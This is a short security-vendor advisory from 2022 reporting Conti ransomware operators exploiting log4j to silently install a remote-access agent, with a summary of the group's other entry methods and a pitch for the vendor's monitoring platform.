SpearTip | March 2nd, 2022

Based on SpearTip Threat Intelligence gained through our 24/7 Incident Response practice, we observed Conti ransomware operators in partner environments attempting to exploit the log4j vulnerability.

In the past, Conti operators have targeted various industries, including Healthcare, Critical Infrastructure, Manufacturing, and Enterprise level businesses. Conti has been heavily involved with the global conflict between Ukraine and Russia as of late and operators from both countries are utilizing cyberattacks to disrupt various operations.

Conti’s observed attack vectors include exploiting RDP, “PrintNightmare”, and “Zerologon” vulnerabilities to infiltrate networks.

Conti has also used phishing attacks containing malicious links and attachments such as Excel files. The Excel files contain a malicious payload, and when the user downloads the document, a Bazaar backdoor malware will be downloaded to connect the victim’s device to Conti’s command-and-control server. Conti will encrypt data and implement the “double extortion” scheme once it’s on the compromised machine.

The ransomware loads an encrypted DDL into memory and executes the encryption method spreading throughout the network. Threat actors use the ransomware to gain access to unprotected RDP ports, use phishing emails to remote access the network through an employee’s computer, or access the network using malicious attachments, downloads, application patch exploits or vulnerabilities.

Attack Method

In this instance, Conti threat actors are attempting to exploit the log4J vulnerability to download an MSIinstaller named setup.msi and quietly execute it in the background. The executable file is then attempting to install the AteraAgent, an RMM tool, which would provide remote access to client endpoints. VMware products are being particularly targeted by this exploit technique.

 

 

 

ShadowSpear is capable of blocking this attack on execution and the SOC is responding to these threats in real-time. We expect these attacks to be relatively widespread. SpearTip will provide more updates as they become available.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

SpearTip’s ShadowSpear platform defends your environment with unparalleled resources preventing cybersecurity threats and attacks from affecting your business. ShadowSpear integrates with cloud, network and endpoint devices providing security. ShadowSpear prevents ransomware from exploiting memory, stopping the threat before the full attack cycle. The ShadowSpear Platform is backed by the engineers in our 24/7 Security Operations Center, ready to assist partners with security issues immediately.

If you or your partners have any questions or concerns surrounding the Conti ransomware group or log4j, please email [email protected] or call our breach response number at 833.997.7327.